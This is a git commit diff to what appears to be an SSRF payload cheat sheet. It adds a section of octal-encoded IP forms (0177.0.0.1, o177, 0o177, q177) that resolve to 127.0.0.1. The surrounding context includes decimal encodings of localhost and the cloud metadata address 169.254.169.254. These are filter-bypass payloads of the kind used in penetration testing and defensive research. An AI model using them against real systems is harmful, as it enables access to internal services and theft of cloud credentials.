Update SSRF

Adding octal techniques for SSRF. 

DEFCON video: https://www.youtube.com/watch?v=_o1RPJAe4kU
This commit is contained in:
clem9669 2021-08-06 15:55:55 +00:00 committed by GitHub
parent ab9e8a2ba2
commit f4053576f4
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -12,6 +12,7 @@
* [Bypass localhost with a domain redirection](#bypass-localhost-with-a-domain-redirection)
* [Bypass localhost with CIDR](#bypass-localhost-with-cidr)
* [Bypass using a decimal IP location](#bypass-using-a-decimal-ip-location)
* [Bypass using octal IP](#bypass-using-octal-ip)
* [Bypass using IPv6/IPv4 Address Embedding](#bypass-using-ipv6ipv4-address-embedding)
* [Bypass using malformed urls](#bypass-using-malformed-urls)
* [Bypass using rare address](#bypass-using-rare-address)
@ -136,13 +137,29 @@ http://127.0.0.0
### Bypass using a decimal IP location
```powershell
http://0177.0.0.1/
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1
http://2852039166/ = http://169.254.169.254
```
### Bypass using octal IP
Implementations differ on how to handle octal format of ipv4.
```sh
http://0177.0.0.1/ = http://127.0.0.1
http://o177.0.0.1/ = http://127.0.0.1
http://0o177.0.0.1/ = http://127.0.0.1
http://q177.0.0.1/ = http://127.0.0.1
...
```
Ref:
- [DEFCON 29-KellyKaoudis SickCodes-Rotten code, aging standards & pwning IPv4 parsing](https://www.youtube.com/watch?v=_o1RPJAe4kU)
- [AppSecEU15-Server_side_browsing_considered_harmful.pdf](https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
### Bypass using IPv6/IPv4 Address Embedding
[IPv6/IPv4 Address Embedding](http://www.tcpipguide.com/free/t_IPv6IPv4AddressEmbedding.htm)
@ -797,6 +814,7 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
## References
- [AppSecEU15-Server_side_browsing_considered_harmful.pdf](https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
- [Extracting AWS metadata via SSRF in Google Acquisition - tghawkins - 2017-12-13](https://hawkinsecurity.com/2017/12/13/extracting-aws-metadata-via-ssrf-in-google-acquisition/)
- [ESEA Server-Side Request Forgery and Querying AWS Meta Data](http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/) by Brett Buerhaus
- [SSRF and local file read in video to gif converter](https://hackerone.com/reports/115857)